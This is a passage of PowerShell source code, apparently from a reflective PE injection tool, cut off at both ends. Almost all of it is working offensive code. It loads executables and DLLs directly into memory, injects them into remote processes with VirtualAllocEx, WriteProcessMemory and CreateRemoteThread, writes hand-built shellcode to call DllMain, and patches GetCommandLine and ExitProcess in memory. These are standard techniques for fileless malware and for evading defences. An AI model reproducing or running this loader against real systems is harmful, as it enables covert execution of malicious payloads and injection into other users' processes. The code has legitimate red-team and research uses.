- [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics
- [UInt32]$SectionSize = $SectionHeader.VirtualSize
- [UInt32]$OldProtectFlag = 0
- Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null
- $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)
- if ($Success -eq $false)
- {
- Throw "Unable to change memory protection"
- }
- }
- }
- Function Update-ExeFunctions
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [System.Object]
- $PEInfo,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Constants,
- [Parameter(Position = 3, Mandatory = $true)]
- [String]
- $ExeArguments,
- [Parameter(Position = 4, Mandatory = $true)]
- [IntPtr]
- $ExeDoneBytePtr
- )
- $ReturnArray = @()
- $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
- [UInt32]$OldProtectFlag = 0
- [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll")
- if ($Kernel32Handle -eq [IntPtr]::Zero)
- {
- throw "Kernel32 handle null"
- }
- [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll")
- if ($KernelBaseHandle -eq [IntPtr]::Zero)
- {
- throw "KernelBase handle null"
- }
- $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
- $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
- [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA")
- [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW")
- if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
- {
- throw "GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)"
- }
- [Byte[]]$Shellcode1 = @()
- if ($PtrSize -eq 8)
- {
- $Shellcode1 += 0x48
- }
- $Shellcode1 += 0xb8
- [Byte[]]$Shellcode2 = @(0xc3)
- $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length
- $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
- $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
- $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null
- $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null
- $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)
- $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)
- [UInt32]$OldProtectFlag = 0
- $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
- if ($Success = $false)
- {
- throw "Call to VirtualProtect failed"
- }
- $GetCommandLineAAddrTemp = $GetCommandLineAAddr
- Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp
- $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)
- $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize
- Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp
- $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
- [UInt32]$OldProtectFlag = 0
- $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
- if ($Success = $false)
- {
- throw "Call to VirtualProtect failed"
- }
- $GetCommandLineWAddrTemp = $GetCommandLineWAddr
- Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
- $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)
- $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize
- Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp
- $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
- $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" `
- , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll")
- foreach ($Dll in $DllList)
- {
- [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)
- if ($DllHandle -ne [IntPtr]::Zero)
- {
- [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln")
- [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln")
- if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)
- {
- "Error, couldn't find _wcmdln or _acmdln"
- }
- $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)
- $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)
- $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])
- $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])
- $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
- $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)
- $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)
- $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)
- $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
- if ($Success = $false)
- {
- throw "Call to VirtualProtect failed"
- }
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)
- $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
- $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)
- if ($Success = $false)
- {
- throw "Call to VirtualProtect failed"
- }
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)
- $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null
- }
- }
- $ReturnArray = @()
- $ExitFunctions = @()
- [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll")
- if ($MscoreeHandle -eq [IntPtr]::Zero)
- {
- throw "mscoree handle null"
- }
- [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess")
- if ($CorExitProcessAddr -eq [IntPtr]::Zero)
- {
- Throw "CorExitProcess address not found"
- }
- $ExitFunctions += $CorExitProcessAddr
- [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess")
- if ($ExitProcessAddr -eq [IntPtr]::Zero)
- {
- Throw "ExitProcess address not found"
- }
- $ExitFunctions += $ExitProcessAddr
- [UInt32]$OldProtectFlag = 0
- foreach ($ProcExitFunctionAddr in $ExitFunctions)
- {
- $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr
- [Byte[]]$Shellcode1 = @(0xbb)
- [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
- if ($PtrSize -eq 8)
- {
- [Byte[]]$Shellcode1 = @(0x48, 0xbb)
- [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
- }
- [Byte[]]$Shellcode3 = @(0xff, 0xd3)
- $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length
- [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread")
- if ($ExitThreadAddr -eq [IntPtr]::Zero)
- {
- Throw "ExitThread address not found"
- }
- $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
- if ($Success -eq $false)
- {
- Throw "Call to VirtualProtect failed"
- }
- $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)
- $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null
- $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)
- Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp
- $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)
- $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
- Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp
- $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)
- $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize
- Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp
- $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
- }
- Write-Output $ReturnArray
- }
- Function Copy-ArrayOfMemAddresses
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Array[]]
- $CopyInfo,
- [Parameter(Position = 1, Mandatory = $true)]
- [System.Object]
- $Win32Functions,
- [Parameter(Position = 2, Mandatory = $true)]
- [System.Object]
- $Win32Constants
- )
- [UInt32]$OldProtectFlag = 0
- foreach ($Info in $CopyInfo)
- {
- $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)
- if ($Success -eq $false)
- {
- Throw "Call to VirtualProtect failed"
- }
- $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null
- $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null
- }
- }
- Function Get-MemoryProcAddress
- {
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [IntPtr]
- $PEHandle,
- [Parameter(Position = 1, Mandatory = $true)]
- [String]
- $FunctionName
- )
- $Win32Types = Get-Win32Types
- $Win32Constants = Get-Win32Constants
- $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
- if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)
- {
- return [IntPtr]::Zero
- }
- $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)
- $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)
- for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)
- {
- $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
- $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))
- $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)
- if ($Name -ceq $FunctionName)
- {
- $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))
- $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])
- $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))
- $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])
- return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)
- }
- }
- return [IntPtr]::Zero
- }
- Function Invoke-MemoryLoadLibrary
- {
- Param(
- [Parameter( Position = 0, Mandatory = $true )]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1, Mandatory = $false)]
- [String]
- $ExeArgs,
- [Parameter(Position = 2, Mandatory = $false)]
- [IntPtr]
- $RemoteProcHandle,
- [Parameter(Position = 3)]
- [Bool]
- $ForceASLR = $false
- )
- $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
- $Win32Constants = Get-Win32Constants
- $Win32Functions = Get-Win32Functions
- $Win32Types = Get-Win32Types
- $RemoteLoading = $false
- if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))
- {
- $RemoteLoading = $true
- }
- Write-Verbose "Getting basic PE information from the file"
- $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
- $OriginalImageBase = $PEInfo.OriginalImageBase
- $NXCompatible = $true
- if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
- {
- Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
- $NXCompatible = $false
- }
- $Process64Bit = $true
- if ($RemoteLoading -eq $true)
- {
- $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
- $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process")
- if ($Result -eq [IntPtr]::Zero)
- {
- Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit"
- }
- [Bool]$Wow64Process = $false
- $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)
- if ($Success -eq $false)
- {
- Throw "Call to IsWow64Process failed"
- }
- if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))
- {
- $Process64Bit = $false
- }
- $PowerShell64Bit = $true
- if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
- {
- $PowerShell64Bit = $false
- }
- if ($PowerShell64Bit -ne $Process64Bit)
- {
- throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process"
- }
- }
- else
- {
- if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)
- {
- $Process64Bit = $false
- }
- }
- if ($Process64Bit -ne $PEInfo.PE64Bit)
- {
- Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)"
- }
- Write-Verbose "Allocating memory for the PE and write its headers to memory"
- [IntPtr]$LoadAddr = [IntPtr]::Zero
- $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
- if ((-not $ForceASLR) -and (-not $PESupportsASLR))
- {
- Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue
- [IntPtr]$LoadAddr = $OriginalImageBase
- }
- elseif ($ForceASLR -and (-not $PESupportsASLR))
- {
- Write-Verbose "PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash."
- }
- if ($ForceASLR -and $RemoteLoading)
- {
- Write-Error "Cannot use ForceASLR when loading in to a remote process." -ErrorAction Stop
- }
- if ($RemoteLoading -and (-not $PESupportsASLR))
- {
- Write-Error "PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process" -ErrorAction Stop
- }
- $PEHandle = [IntPtr]::Zero
- $EffectivePEHandle = [IntPtr]::Zero
- if ($RemoteLoading -eq $true)
- {
- $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
- if ($EffectivePEHandle -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use"
- }
- }
- else
- {
- if ($NXCompatible -eq $true)
- {
- $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
- }
- else
- {
- $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
- }
- $EffectivePEHandle = $PEHandle
- }
- [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)
- if ($PEHandle -eq [IntPtr]::Zero)
- {
- Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)."
- }
- [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null
- Write-Verbose "Getting detailed PE information from the headers loaded in memory"
- $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
- $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress
- $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle
- Write-Verbose "StartAddress: $(Get-Hex $PEHandle) EndAddress: $(Get-Hex $PEEndAddress)"
- Write-Verbose "Copy PE sections in to memory"
- Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types
- Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory"
- Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types
- Write-Verbose "Import DLL's needed by the PE we are loading"
- if ($RemoteLoading -eq $true)
- {
- Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle
- }
- else
- {
- Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants
- }
- if ($RemoteLoading -eq $false)
- {
- if ($NXCompatible -eq $true)
- {
- Write-Verbose "Update memory protection flags"
- Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types
- }
- else
- {
- Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute"
- }
- }
- else
- {
- Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions"
- }
- if ($RemoteLoading -eq $true)
- {
- [UInt32]$NumBytesWritten = 0
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)
- if ($Success -eq $false)
- {
- Throw "Unable to write shellcode to remote process memory."
- }
- }
- if ($PEInfo.FileType -ieq "DLL")
- {
- if ($RemoteLoading -eq $false)
- {
- Write-Verbose "Calling dllmain so the DLL knows it has been loaded"
- $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
- $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
- $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null
- }
- else
- {
- $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
- if ($PEInfo.PE64Bit -eq $true)
- {
- $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
- $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
- $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
- }
- else
- {
- $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
- $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
- $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
- }
- $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
- $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
- $SCPSMemOriginal = $SCPSMem
- Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
- [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
- Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
- $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
- $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
- if ($RSCAddr -eq [IntPtr]::Zero)
- {
- Throw "Unable to allocate memory in the remote process for shellcode"
- }
- $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
- if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
- {
- Throw "Unable to write shellcode to remote process memory."
- }
- $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
- $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
- if ($Result -ne 0)
- {
- Throw "Call to CreateRemoteThread to call GetProcAddress failed."
- }
- $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
- }
- }
- elseif ($PEInfo.FileType -ieq "EXE")
- {
- [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
- [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
- $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
- [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
- Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
- $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
- while($true)
- {
- [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
- if ($ThreadDone -eq 1)
- {
- Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
- Write-Verbose "EXE thread has completed."
- break
- }
- else
- {
- Start-Sleep -Seconds 1
- }
- }
- }
- return @($PEInfo.PEHandle, $EffectivePEHandle)
- }
- Function Invoke-MemoryFreeLibrary
- {
- Param(
- [Parameter(Position=0, Mandatory=$true)]
- [IntPtr]
- $PEHandle
- )
- $Win32Constants = Get-Win32Constants
- $Win32Functions = Get-Win32Functions
- $Win32Types = Get-Win32Types
- $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
- if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
- {
- [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
- while ($true)
- {
- $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
- if ($ImportDescriptor.Characteristics -eq 0 `
- -and $ImportDescriptor.FirstThunk -eq 0 `
- -and $ImportDescriptor.ForwarderChain -eq 0 `
- -and $ImportDescriptor.Name -eq 0 `
- -and $ImportDescriptor.TimeDateStamp -eq 0)
- {
- Write-Verbose "Done unloading the libraries needed by the PE"
- break
- }
- $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
- $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
- if ($ImportDllHandle -eq $null)
- {
